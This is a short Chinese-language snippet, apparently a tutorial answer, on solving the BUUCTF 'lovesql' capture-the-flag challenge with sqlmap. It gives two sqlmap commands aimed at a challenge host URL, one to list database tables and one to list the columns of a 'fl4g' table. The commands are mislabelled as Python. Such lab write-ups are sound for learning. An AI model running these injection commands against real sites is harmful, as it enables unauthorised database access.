buuctf+lovesql+++sqlmap
时间: 2023-12-11 12:03:42 浏览: 131
SQL注入+sqlmap使用
SQLMAP是一款开源的渗透测试工具,用于检测和利用SQL注入漏洞。它可以自动化地检测和利用SQL注入漏洞,并且可以获取数据库服务器的完整权限。下面是使用SQLMAP查看数据中的列表和字段的方法:
1. 查看数据中的列表
```python
python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D mysql --tables
```
其中,-u参数指定了目标URL,-D参数指定了要查询的数据库名称,--tables参数表示要查看该数据库中的所有表。
2. 查看列表中的字段
```python
python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g --columns
```
其中,-T参数指定了要查询的表名,--columns参数表示要查看该表中的所有字段。
阅读全文